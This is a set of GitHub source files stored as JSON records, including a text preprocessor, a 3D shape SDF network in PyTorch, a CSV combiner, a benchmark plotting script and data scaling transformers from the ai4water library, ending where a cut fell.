Ignoring.\" % (denom, col))\n else:\n Hbar[:, col] = H[:, col] / math.sqrt(denom)\n Hhat += (numpy.diag(H[:, col]) / denom)\n\n # recover the word-word co-occurrence matrix Q\n return numpy.dot(Hbar, Hbar.transpose()) - Hhat\n\n\n\nif __name__ == '__main__':\n base_dir = 'datasets/SentenceCorpus/unlabeled_articles'\n stop_file = 'datasets/SentenceCorpus/word_lists/stopwords.txt'\n clean_dir = 'datasets/SentenceCorpus/cleaned'\n prune_dir= 'datasets/SentenceCorpus/pruned'\n vocab_size = 1000\n\n with open(stop_file) as stopfile:\n stops = [stop.strip() for stop in stopfile]\n\n dirs = [os.path.join(base_dir, dir) for dir in os.listdir(base_dir)\n if os.path.isdir(os.path.join(base_dir, dir)) and not dir.startswith('.')]\n\n allfiles = [os.path.join(direct, file) for direct in dirs for file in os.listdir(direct)\n if os.path.isfile(os.path.join(direct, file)) and not file.startswith('.')]\n\n for dir in dirs:\n files = [os.path.join(dir, file) for file in os.listdir(dir)\n if os.path.isfile(os.path.join(dir, file)) and not file.startswith('.')]\n cleandir = os.path.join(clean_dir, os.path.basename(dir))\n prunedir = os.path.join(prune_dir, os.path.basename(dir))\n stop_remover(files, stops, cleandir)\n files = [os.path.join(cleandir, file) for file in os.listdir(cleandir)\n if os.path.isfile(os.path.join(cleandir, file)) and not file.startswith('.')]\n print(\"Files have been stripped of stop words\")\n\n voc = find_most_common(allfiles, vocab_size)\n word_filter(files, voc, prunedir)\n print(\"Files have been stripped of words not in vocab\\n\")\n\n\n\n\n","repo_name":"BryceWoodworth/InteractiveAnchors","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"177488202","text":"import torch\nimport torch.nn as nn\nfrom torchvision import models\nimport config\n\nclass SDFNet(nn.Module):\n ''' SDFNet 3D regressor class\n\n Args:\n input_point_dim: dimension of input points, default to 3\n latent_dim: dimension of conditioned code, default to 256\n size_hidden: dimension of points block hidden size, default to 256\n pretrained: whether the encoder is ImageNet pretrained, \n default to False\n\n '''\n def __init__(self, input_point_dim=3, latent_dim=256, size_hidden=256, pretrained=False):\n super().__init__()\n\n self.encoder = Encoder(latent_dim, pretrained=pretrained)\n self.decoder = Decoder(input_point_dim, latent_dim, size_hidden)\n\n def forward(self, points, inputs):\n assert points.size(0) == inputs.size(0)\n batch_size = points.size(0)\n latent_feats = self.encoder(inputs)\n score = self.decoder(points, latent_feats)\n return score\n\nclass Encoder(nn.Module):\n def __init__(self, latent_dim, pretrained):\n super().__init__()\n self.features = models.resnet18(\\\n pretrained=pretrained)\n # Reinitialize the first conv layer for D+N inputs\n if config.path['input_image_path'] is None:\n self.features.conv1 = nn.Conv2d(4,\\\n 64,\\\n kernel_size=7,\\\n stride=2,\\\n padding=3,\\\n bias=False)\n self.features.fc = nn.Sequential()\n self.fc = nn.Linear(512, latent_dim)\n\n def forward(self, x):\n feat = self.features(x)\n latent_feat = self.fc(feat)\n return latent_feat \n\nclass Decoder(nn.Module):\n def __init__(self, input_dim, latent_dim, size_hidden):\n super().__init__()\n self.fc_p = nn.Conv1d(input_dim, size_hidden, 1)\n \n self.block0 = CResnetBlockConv(latent_dim, size_hidden)\n self.block1 = CResnetBlockConv(latent_dim, 
size_hidden)\n self.block2 = CResnetBlockConv(latent_dim, size_hidden)\n self.block3 = CResnetBlockConv(latent_dim, size_hidden)\n self.block4 = CResnetBlockConv(latent_dim, size_hidden)\n\n self.bn = CBatchNorm(latent_dim, size_hidden)\n\n self.fc_out = nn.Conv1d(size_hidden, 1, 1)\n\n self.actvn = nn.ReLU()\n\n def forward(self, p, c):\n p = p.transpose(1, 2)\n batch_size, D, T = p.size()\n net = self.fc_p(p)\n\n net = self.block0(net, c)\n net = self.block1(net, c)\n net = self.block2(net, c)\n net = self.block3(net, c)\n net = self.block4(net, c)\n\n out = self.fc_out(self.actvn(self.bn(net, c)))\n out = out.squeeze(1)\n\n return out\n\nclass CBatchNorm(nn.Module):\n def __init__(self, latent_dim, feature_dim):\n super().__init__()\n self.latent_dim = latent_dim\n \n self.feature_dim = feature_dim\n self.conv_gamma = nn.Conv1d(self.latent_dim, self.feature_dim, 1)\n self.conv_beta = nn.Conv1d(self.latent_dim, self.feature_dim, 1)\n self.bn = nn.BatchNorm1d(self.feature_dim, affine=False)\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.zeros_(self.conv_gamma.weight)\n nn.init.zeros_(self.conv_beta.weight)\n nn.init.ones_(self.conv_gamma.bias)\n nn.init.zeros_(self.conv_beta.bias)\n\n def forward(self, x, c):\n latent = c\n assert(x.size(0) == c.size(0))\n assert(c.size(1) == self.latent_dim)\n\n # c is assumed to be of size batch_size x latent_dim x T\n if len(c.size()) == 2:\n c = c.unsqueeze(2)\n\n # Affine mapping\n gamma = self.conv_gamma(c)\n beta = self.conv_beta(c)\n\n # Batchnorm\n net = self.bn(x)\n out = gamma * net + beta\n\n return out\n\nclass CResnetBlockConv(nn.Module):\n def __init__(self, latent_dim, size_in, size_hidden=None, size_out=None):\n super().__init__()\n if size_hidden is None:\n size_hidden = size_in\n if size_out is None:\n size_out = size_in\n\n self.size_in = size_in\n self.size_hidden = size_hidden\n self.size_out = size_out\n\n self.bn_0 = CBatchNorm(\\\n latent_dim, self.size_in)\n self.bn_1 = CBatchNorm(\\\n latent_dim, self.size_hidden)\n\n self.fc_0 = nn.Conv1d(self.size_in, self.size_hidden, 1)\n self.fc_1 = nn.Conv1d(self.size_hidden, self.size_out, 1)\n self.actvn = nn.ReLU()\n\n nn.init.zeros_(self.fc_1.weight)\n\n def forward(self, x, c):\n net = self.fc_0(self.actvn(self.bn_0(x, c)))\n dx = self.fc_1(self.actvn(self.bn_1(net, c)))\n\n return x + dx\n \n","repo_name":"rehg-lab/3DShapeGen","sub_path":"SDFNet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":116,"dataset":"github-code","pt":"72"} +{"seq_id":"34779622536","text":"import glob\r\nimport pandas as pd \r\n\r\npath = './data_files/'\r\nfiles = glob.glob(path + '*.csv')\r\n\r\nframes = []\r\n\r\nfor file in files: \r\n # Frame per file\r\n df = pd.read_csv(file, index_col=None, sep=',', header=0)\r\n print(df)\r\n frames.append(df)\r\n\r\n# Combine frames \r\nframe = pd.concat(frames, axis=0, ignore_index=True)\r\n\r\n# Write to 1 CSV\r\nframe.to_csv(path + \"combined_data.csv\")\r\n","repo_name":"maxwellpark/python_etl_utils","sub_path":"data_preparation/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16920117956","text":"import pandas as pd\nimport numpy as np\nfrom datetime import timedelta\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\n\ndf = pd.read_csv(\"out.csv\")\n\nmask = df.tool == 
\"cbmc\"\nmask_cvc4 = df.tool == \"cbmc-cvc4\"\ndf.loc[mask, \"assertions_reached\"] = np.NaN\ndf.loc[mask_cvc4, \"assertions_reached\"] = np.NaN\n\ndelta = timedelta(minutes=30)\ndf[\"elapsed_time\"].replace({\"-1\": delta}, inplace=True)\ndf = df.astype({'elapsed_time': 'str'})\ndf[\"elapsed_time\"] = df[\"elapsed_time\"].map(pd.Timedelta)\ndf[\"elapsed_time_secs\"] = df[\"elapsed_time\"].map(lambda x: x.total_seconds())\ndf = df.replace(-1, np.NaN)\ndf[\"branch percentage\"] = df[\"branches_covered\"] / df[\"total_branches\"]\n\nprint(df.dtypes)\ngrouped = df.groupby([\"program\", \"tool\"]).mean()\ngrouped = grouped[[\"branches_covered\",\n \"total_branches\", \"assertions_reached\", \"elapsed_time_secs\"]]\ngrouped.columns = [\"branches covered\", \"total branches\",\n \"assertions reached\", \"time (s)\"]\nbigtable = grouped.to_latex()\nwith open(\"bigtable.tex\", \"w+\") as f:\n f.write(bigtable)\nstyle.use('ggplot')\nsns.set_context(\"paper\", font_scale=1)\nsorted_tools = sorted(list(set(df[\"tool\"])))\nax = sns.catplot(\n x=\"tool\", # x variable name\n y=\"elapsed_time_secs\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\n\nplt.savefig('elapsed.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"assertions_reached\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('assertions.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"branches_covered\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('cover.png', dpi=300)\n\nsns.catplot(\n x=\"tool\", # x variable name\n y=\"branch percentage\", # y variable name\n # hue=\"tool\", # group variable name\n data=df, # dataframe to plot\n kind=\"bar\",\n order=sorted_tools)\n\nplt.xticks(rotation=30, horizontalalignment='right')\nplt.tight_layout()\nplt.savefig('coverp.png', dpi=300)\n\n# plt.show()\n\ngrouped = df.groupby([\"program\", \"tool\"]).max()\nwinners = grouped.groupby(\"program\").idxmax()\nwinners[\"branches_covered\"] = winners[\"branches_covered\"].map(lambda x: x[1])\nwinners[\"branch percentage\"] = winners[\"branch percentage\"].map(lambda x: x[1])\nwinners[\"assertions_reached\"] = winners[\"assertions_reached\"].map(lambda x: x[1])\nwinners = winners[[\"branches_covered\", \"branch percentage\", \"assertions_reached\"]]\nbranch_wins = winners[\"branches_covered\"].value_counts()\nbranchp_wins = winners[\"branch percentage\"].value_counts()\nass_wins = winners[\"assertions_reached\"].value_counts()\nwins = {}\nfor tool in sorted_tools:\n wins[tool] = {}\n if tool in ass_wins:\n wins[tool][\"Assertions Reached\"] = ass_wins[tool]\n else:\n wins[tool][\"Assertions Reached\"] = 0\n if tool in branch_wins:\n wins[tool][\"Branches Covered\"] = branch_wins[tool]\n else:\n wins[tool][\"Branches Covered\"] = 0\n if tool in branchp_wins:\n wins[tool][\"Percentage of Total Branches\"] = branchp_wins[tool]\n else:\n wins[tool][\"Percentage of Total Branches\"] = 0\nwins_df = pd.DataFrame(wins)\nprint(wins_df)\nwinstable = wins_df.T.to_latex()\nwith open(\"wins.tex\", \"w+\") as f:\n f.write(winstable)\n\ngrouped = 
df.groupby([\"tool\"]).sum()\nprint(grouped)\n","repo_name":"dylanjwolff/program-analysis-project","sub_path":"scripts/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28988063384","text":"import sys\nimport threading\nimport time\nimport queue\n\n\ndef myThread(queue):\n while True:\n try:\n time.sleep(2)\n raise Exception(\"Exception Thrown In Child Thread {}\".format(threading.current_thread()))\n except:\n queue.put(sys.exc_info())\n\nqueue = queue.Queue()\nmyThread = threading.Thread(target=myThread, args=(queue,))\nmyThread.start()\n\nwhile True: \n try:\n exception = queue.get()\n except Queue.Empty:\n pass\n else:\n print(exception)\n break\n","repo_name":"elliotforbes/Concurrency-With-Python","sub_path":"Chapter 06/threadException.py","file_name":"threadException.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"30743570745","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0015_userextended_photo_or_video'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='userextended',\n old_name='photo_or_video',\n new_name='gender',\n ),\n ]\n","repo_name":"bharathramh92/easy-ecom","sub_path":"accounts/migrations/0016_auto_20150814_1727.py","file_name":"0016_auto_20150814_1727.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8872030785","text":"fname = input('Enter File: ')\r\nif len(fname) < 1 :\r\n fname = 'clown.txt'\r\n\r\nhand = open(fname)\r\n\r\ndic = open(fname)\r\n\r\ndic = dict()\r\nfor lin in hand:\r\n lin = lin.strip()\r\n #print(lin)\r\n words=lin.split()\r\n #print(words)\r\n\r\n\r\nfor word in words:\r\n #if word not in dic:\r\n # dic[word] = 1\r\n #else:\r\n # dic[word] = dic[word] + 1\r\n dic[word] = dic.get(word,0) +1\r\n #print(word, dic[word])\r\n\r\nlargest = 0\r\ntheword = None\r\nfor key, value in dic.items():\r\n print(key, value)\r\n if value > largest:\r\n largest = value\r\n theword = key\r\n\r\nprint('Done',theword,largest)","repo_name":"slihump/study","sub_path":"python/dictionaries_ex2.py","file_name":"dictionaries_ex2.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74584651113","text":"\nfrom typing import List\n\nfrom scipy.special import boxcox\nfrom scipy.special import expit\n\nfrom ai4water.backend import np, sklearn\nfrom ai4water.utils.utils import jsonize\n\nSKMinMaxScaler = sklearn.preprocessing.MinMaxScaler\nSKStandardScaler = sklearn.preprocessing.StandardScaler\nSKRobustScaler = sklearn.preprocessing.RobustScaler\nSKPowerTransformer = sklearn.preprocessing.PowerTransformer\nSKQuantileTransformer = sklearn.preprocessing.QuantileTransformer\nSKFunctionTransformer = sklearn.preprocessing.FunctionTransformer\nSKMaxAbsScaler = sklearn.preprocessing.MaxAbsScaler\ncheck_is_fitted = sklearn.utils.validation.check_is_fitted\n\n# todo\n# inverse hyperbolic transformation: effective with many zeros\n\nclass ScalerWithConfig(object):\n \"\"\"Extends the sklearn's scalers in such a way that they can be\n saved to a json file an d loaded from a json 
file\n\n Methods\n --------\n - config\n - form_config\n \"\"\"\n\n @property\n def config_paras(self) -> list:\n raise NotImplementedError\n\n def get_params(self):\n raise NotImplementedError\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n return scaler\n\n def config(self) -> dict:\n \"\"\"Returns all the parameters in scaler/transformer in a dictionary\"\"\"\n if self.__class__.__name__ == 'MyFunctionTransformer':\n pass\n else:\n check_is_fitted(self)\n\n _config = {}\n for attr in self.config_paras:\n _config[attr] = getattr(self, attr)\n\n return {\"params\": self.get_params(),\n \"config\": _config}\n\n\nclass MinMaxScaler(SKMinMaxScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'min_', 'n_samples_seen_', 'data_min_', 'data_max_', 'data_range_']\n\n\nclass StandardScaler(SKStandardScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'n_samples_seen_', 'mean_', 'var_', 'n_features_in_']\n\n\nclass RobustScaler(SKRobustScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'center_']\n\n\nclass PowerTransformer(SKPowerTransformer, ScalerWithConfig):\n \"\"\"This transformation enhances scikit-learn's PowerTransformer by allowing\n the user to define `lambdas` parameter for each input feature. The default\n behaviour of this transformer is same as that of scikit-learn's.\n \"\"\"\n def __init__(self, method='yeo-johnson', *,\n rescale=False,\n pre_center:bool = False,\n standardize=True,\n copy=True,\n lambdas=None):\n \"\"\"\n lambdas: float or 1d array like for each feature. If not given, it is\n calculated from scipy.stats.boxcox(X, lmbda=None). Only available\n if method is box-cox.\n pre_center:\n center the data before applying power transformation. see github [1] for more discussion\n rescale:\n For complete documentation see scikit-learn's documentation [2]\n\n .. [2]\n https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.PowerTransformer.html\n\n .. 
[1]\n https://github.com/scikit-learn/scikit-learn/issues/14959\n \"\"\"\n if lambdas is not None:\n if isinstance(lambdas, float):\n lambdas = np.array([lambdas])\n lambdas = np.array(lambdas)\n # if given, lambdas must be a 1d array\n assert lambdas.size == len(lambdas)\n lambdas = lambdas.reshape(-1,)\n assert method != \"yeo-johnson\"\n\n self.lambdas = lambdas\n self.rescale = rescale\n self.pre_center = pre_center\n\n super(PowerTransformer, self).__init__(method=method,\n standardize=standardize,\n copy=copy)\n\n @property\n def config_paras(self):\n return ['lambdas_', 'scaler_to_standardize_',\n 'pre_center_config_', 'rescaler_config_', 'n_features_in_']\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n _scaler_config = config['config'].pop('scaler_to_standardize_')\n setattr(scaler, '_scaler', StandardScaler.from_config(_scaler_config))\n\n rescaler = config['config'].pop('rescaler_config_')\n if rescaler:\n setattr(scaler, 'rescaler_', MinMaxScaler.from_config(rescaler))\n else:\n setattr(scaler, 'rescaler_', None)\n\n pre_standardizer = config['config'].pop('pre_center_config_')\n if pre_standardizer:\n setattr(scaler, 'pre_centerer_', Center.from_config(pre_standardizer))\n else:\n setattr(scaler, 'pre_centerer_', None)\n\n for attr, attr_val in config['config'].items():\n setattr(scaler, attr, attr_val)\n\n if isinstance(scaler.lambdas_, float):\n scaler.lambdas_ = [scaler.lambdas_]\n return scaler\n\n def _fit(self, X, y=None, force_transform=False):\n \"\"\"Copying from sklearn because we want to use our own StandardScaler\n which can be serialized, and optionally with a user-provided lambda\n parameter.\"\"\"\n 
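# overall flow: optional min-max rescaling, optional centering,\n # per-feature lambda estimation (or the user-supplied lambdas), then\n # an optional final standardization with a serializable StandardScaler\n 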
X = self._check_input(X, in_fit=True, check_positive=True,\n check_method=True)\n\n if not self.copy and not force_transform: # if call from fit()\n X = X.copy() # force copy so that fit does not change X inplace\n\n X = self._maybe_rescale(X, force_transform)\n\n X = self._maybe_precenter(X, force_transform)\n\n optim_function = {'box-cox': self._box_cox_optimize,\n 'yeo-johnson': self._yeo_johnson_optimize\n }[self.method]\n if self.lambdas is None:\n with np.errstate(invalid='ignore'): # hide NaN warnings\n self.lambdas_ = np.array([optim_function(col) for col in X.T])\n else: # take user defined lambdas\n self.lambdas_ = self.lambdas\n\n if self.standardize or force_transform:\n transform_function = {'box-cox': boxcox,\n 'yeo-johnson': self._yeo_johnson_transform\n }[self.method]\n for i, lmbda in enumerate(self.lambdas_):\n with np.errstate(invalid='ignore'): # hide NaN warnings\n X[:, i] = transform_function(X[:, i], lmbda)\n\n setattr(self, 'scaler_to_standardize_', None)\n if self.standardize:\n self._scaler = StandardScaler(copy=False)\n if force_transform:\n X = self._scaler.fit_transform(X)\n else:\n self._scaler.fit(X)\n\n setattr(self, 'scaler_to_standardize_', self._scaler.config())\n\n return X\n\n def _maybe_rescale(self, X, force_transform):\n self.rescaler_config_ = None\n if self.rescale:\n rescaler = MinMaxScaler()\n self.rescaler_ = rescaler\n if force_transform:\n X = rescaler.fit_transform(X)\n else:\n # MinMaxScaler.fit returns the scaler, not the data, so do\n # not rebind X here; only fit the rescaler\n rescaler.fit(X)\n\n self.rescaler_config_ = rescaler.config()\n return X\n\n def _maybe_precenter(self, X, force_transform=False):\n self.pre_center_config_ = None\n if self.pre_center:\n pre_centerer = Center()\n self.pre_centerer_ = pre_centerer\n if force_transform:\n X = pre_centerer.fit_transform(X)\n else:\n X = pre_centerer.fit(X)\n\n self.pre_center_config_ = pre_centerer.config()\n return X\n\n def inverse_transform(self, X):\n \"\"\"Apply the inverse power transformation using the fitted lambdas.\n\n The inverse of the Box-Cox transformation is given by::\n\n if lambda_ == 0:\n X = exp(X_trans)\n else:\n X = (X_trans * lambda_ + 1) ** (1 / lambda_)\n\n The inverse of the Yeo-Johnson transformation is given by::\n\n if X >= 0 and lambda_ == 0:\n X = exp(X_trans) - 1\n elif X >= 0 and lambda_ != 0:\n X = (X_trans * lambda_ + 1) ** (1 / lambda_) - 1\n elif X < 0 and lambda_ != 2:\n X = 1 - (-(2 - lambda_) * X_trans + 1) ** (1 / (2 - lambda_))\n elif X < 0 and lambda_ == 2:\n X = 1 - exp(-X_trans)\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n The transformed data.\n\n Returns\n -------\n X : ndarray of shape (n_samples, n_features)\n The original data.\n \"\"\"\n X = super(PowerTransformer, self).inverse_transform(X)\n\n if self.pre_center:\n X = self.pre_centerer_.inverse_transform(X)\n\n if self.rescale:\n X = self.rescaler_.inverse_transform(X)\n\n return X\n\nclass QuantileTransformer(SKQuantileTransformer, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['n_quantiles_', 'references_', 'quantiles_']\n\n @classmethod\n def from_config(cls, config: dict):\n \"\"\"Build the scaler/transformer from config\n\n Arguments:\n config : dictionary of parameters which can be used to build transformer/scaler.\n\n Returns :\n An instance of scaler/transformer\n \"\"\"\n scaler = cls(**config['params'])\n setattr(scaler, '_config', config['config'])\n setattr(scaler, '_from_config', True)\n\n scaler.n_quantiles_ = config['config']['n_quantiles_']\n 
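# references_ and quantiles_ were stored as plain lists in the saved\n # config; rebuild them as numpy arrays before the scaler is used\n 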
scaler.references_ = np.array(config['config']['references_'])\n quantiles_ = np.array(config['config']['quantiles_'])\n # make sure it is 2d\n quantiles_ = quantiles_.reshape(len(quantiles_), -1)\n scaler.quantiles_ = quantiles_\n return scaler\n\n\nclass MaxAbsScaler(SKMaxAbsScaler, ScalerWithConfig):\n\n @property\n def config_paras(self):\n return ['scale_', 'n_samples_seen_', 'max_abs_']\n\n\nclass Center(ScalerWithConfig):\n\n def __init__(\n self,\n feature_dim=\"2d\",\n axis=0\n ):\n self.feature_dim = feature_dim\n self.axis = axis\n\n def fit(self, x:np.ndarray):\n dim = x.ndim\n\n mean = np.nanmean(x, axis=self.axis)\n\n setattr(self, 'mean_', mean)\n setattr(self, 'data_dim_', dim)\n return x\n\n def transform(self, x):\n\n return x - self.mean_\n\n def fit_transform(self, x:np.ndarray)->np.ndarray:\n\n self.fit(x)\n return self.transform(x)\n\n def inverse_transform(self, x:np.ndarray)->np.ndarray:\n\n assert x.ndim == self.data_dim_\n return x + self.mean_\n\n @property\n def config_paras(self):\n return ['data_dim_', 'mean_']\n\n def get_params(self):\n return {'feature_dim': self.feature_dim, 'axis': self.axis}\n\nclass Closures(ScalerWithConfig):\n\n def __init__(\n self,\n force_closure:bool = False,\n treat_negative:bool = False\n ):\n\n \"\"\"\n force_closure: bool\n if ture, and input data is not a closure, it will be converted\n into closure by dividing with the sum of input data\n \"\"\"\n self.force_closure = force_closure\n self.treat_negative = treat_negative\n\n def _check_array(self, x):\n\n self.sum_, self.min_ = None, None\n\n if len(x) == x.size:\n x = x.reshape(-1,)\n\n if (x<0).sum() > 0:\n if self.treat_negative:\n self.min_ = np.min(x)\n x = x + self.min_\n else:\n ValueError(f\"x contains {(x[x<0]).sum()} -ve values\")\n\n if not np.allclose(x.sum(), 1.0):\n if self.force_closure:\n self.sum_ = np.sum(x)\n x = x / self.sum_\n else:\n raise ValueError(f\"x is not a closure with sum of {round(x.sum(), 5)}\")\n return x\n\n def _check_array_inv(self, x):\n\n if len(x) == x.size:\n x = x.reshape(-1,)\n\n if self.force_closure:\n x = x * self.sum_\n\n if self.treat_negative:\n x = x - self.min_\n\n return x\n\n def transform(self, x):\n raise NotImplementedError\n\n def fit(self, x):\n return x\n\n def fit_transform(self, x):\n return self.transform(x)\n\n @property\n def config_paras(self)->List[str]:\n return ['sum_', 'min_']\n\n def get_params(self)->dict:\n return {\n 'force_closure': self.force_closure,\n 'treat_negative': self.treat_negative,\n }\n\n\nclass ALR(Closures):\n \"\"\"\n Additive log ratio transformation\n\n Examples\n ---------\n >>> from easy_mpl import hist\n >>> from ai4water.datasets import busan_beach\n >>> data = busan_beach()\n\n >>> alr_tr = ALR(True, True)\n >>> x = data.iloc[:, 0].values\n >>> x_ = alr_tr.fit_transform(x)\n >>> _x = alr_tr.inverse_transform(x_)\n >>> np.allclose(_x, x)\n True\n >>> hist([x, x_], hist_kws={\"bins\": 100}, share_axes=False,\n ... 
labels=[\"Original\", \"Transformed\"])\n \"\"\"\n def transform(self, x):\n\n denominator_idx = 0\n x = self._check_array(x)\n self.x0_ = x[denominator_idx]\n\n if x.ndim == 2:\n mat_t = x.T\n numerator_idx = list(range(0, mat_t.shape[0]))\n del numerator_idx[denominator_idx]\n x = np.log(mat_t[numerator_idx, :] / mat_t[denominator_idx, :]).T\n\n elif x.ndim == 1:\n numerator_idx = list(range(0, x.shape[0]))\n del numerator_idx[denominator_idx]\n x = np.log(x[numerator_idx] / x[denominator_idx])\n x = np.roll(np.append(x, self.x0_), shift=1)\n\n else:\n raise ValueError(\"mat must be either 1D or 2D\")\n return x\n\n def inverse_transform(self, x):\n\n denominator_idx = 0\n x = np.array(x)\n\n if x.ndim == 2:\n mat_idx = np.insert(x, denominator_idx,\n np.repeat(0, x.shape[0]), axis=1)\n comp = np.zeros(mat_idx.shape)\n comp[:, denominator_idx] = 1 / (np.exp(x).sum(axis=1) + 1)\n numerator_idx = list(range(0, comp.shape[1]))\n del numerator_idx[denominator_idx]\n for i in numerator_idx:\n comp[:, i] = comp[:, denominator_idx] * np.exp(mat_idx[:, i])\n elif x.ndim == 1:\n mat_idx = np.insert(x, denominator_idx, 0, axis=0)\n comp = np.zeros(mat_idx.shape)\n comp[denominator_idx] = 1 / (np.exp(x).sum(axis=0) + 1)\n numerator_idx = list(range(0, comp.shape[0]))\n del numerator_idx[denominator_idx]\n for i in numerator_idx:\n comp[i] = comp[denominator_idx] * np.exp(mat_idx[i])\n else:\n raise ValueError(\"mat must be either 1D or 2D\")\n\n x = self._check_array_inv(x)\n\n return x\n\n\nclass CLR(Closures):\n \"\"\"centre log ratio transformation\n\n Examples\n ---------\n >>> from easy_mpl import hist\n >>> from ai4water.datasets import busan_beach\n >>> data = busan_beach()\n\n >>> clr_tr = CLR(True, True)\n >>> x = data.iloc[:, 0].values\n >>> x_ = clr_tr.fit_transform(x)\n >>> _x = clr_tr.inverse_transform(x_)\n >>> np.allclose(_x, x)\n True\n >>> hist([x, x_], hist_kws={\"bins\": 100}, share_axes=False,\n ... labels=[\"Original\", \"Transformed\"])\n \"\"\"\n\n def transform(\n self,\n x:np.ndarray\n )->np.ndarray:\n\n x = self._check_array(x)\n\n lmat = np.log(x)\n gm = lmat.mean(axis=-1, keepdims=True)\n return (lmat - gm).squeeze()\n\n\n def inverse_transform(self, x:np.ndarray)->np.ndarray:\n emat = np.exp(x)\n x = closure(emat, out=emat)\n\n x = self._check_array_inv(x)\n\n return x\n\n\nclass FuncTransformer(ScalerWithConfig):\n\n \"\"\"function transformer. 
Transforms the array element wise.\"\"\"\n @property\n def func(self):\n raise NotImplementedError\n\n @property\n def inv_func(self):\n raise NotImplementedError\n\n def fit(self, X, y=None):\n return self\n\n def fit_transform(self, x:np.ndarray)->np.ndarray:\n return self.transform(x)\n\n def transform(self, x:np.ndarray)-> np.ndarray:\n\n setattr(self, 'data_dim_', np.ndim(x))\n return self.func(x)\n\n def inverse_transform_without_fit(self, x):\n return self._inverse_transform(x, False)\n\n def _inverse_transform(self, x, check_dim=True):\n return self.inv_func(x)\n\n def inverse_transform(self, x):\n return self._inverse_transform(x)\n\n @property\n def config_paras(self):\n return ['data_dim_']\n\n def get_params(self):\n return {}\n\n\nclass SqrtScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.sqrt\n\n @property\n def inv_func(self):\n return np.square\n\n\nclass LogScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log\n\n @property\n def inv_func(self):\n return np.exp\n\n\nclass Log2Scaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log2\n\n @property\n def inv_func(self):\n return lambda x: np.power(2, x)\n\n\nclass Log10Scaler(FuncTransformer):\n\n @property\n def func(self):\n return np.log10\n\n @property\n def inv_func(self):\n return lambda x: np.power(10, x)\n\n\nclass TanScaler(FuncTransformer):\n\n @property\n def func(self):\n return np.tan\n\n @property\n def inv_func(self):\n return np.tanh\n\n\nclass LogisticSigmoidTransformer(FuncTransformer):\n \"\"\"logistic sigmoid transformer.\n Note that inverse transform of logistic sigmoid does not return\n original array.\n \"\"\"\n @property\n def func(self):\n return expit\n\n @property\n def inv_func(self):\n raise ValueError(\"inverse transform of sigmoid can not be computed\")\n\n\nclass HyperbolicTangentTransformer(FuncTransformer):\n \"\"\"Hyperbolic tangent\"\"\"\n @property\n def func(self):\n return np.tanh\n\n @property\n def inv_func(self):\n raise ValueError(\"inverse transform of tanh can not be computed\")\n\n\nclass CumsumScaler(FuncTransformer):\n\n def __init__(\n self,\n feature_dim: str = \"2d\"\n ):\n \"\"\"\n Arguments:\n feature_dim:\n whether the features are 2 dimensional or 1 dimensional. Only\n relevant if the `x` to `fit_transform` is 3D. In such as case\n if feature_dim is `1D`, it will be considered that the x consists\n of following shape (num_examples, time_steps, num_features)\n\n \"\"\"\n assert feature_dim in (\"1d\", \"2d\")\n self.feature_dim = feature_dim\n\n def fit_transform(self, x:np.ndarray) -> np.ndarray:\n self.data_dim_ = np.ndim(x)\n\n dim = np.ndim(x)\n\n if dim 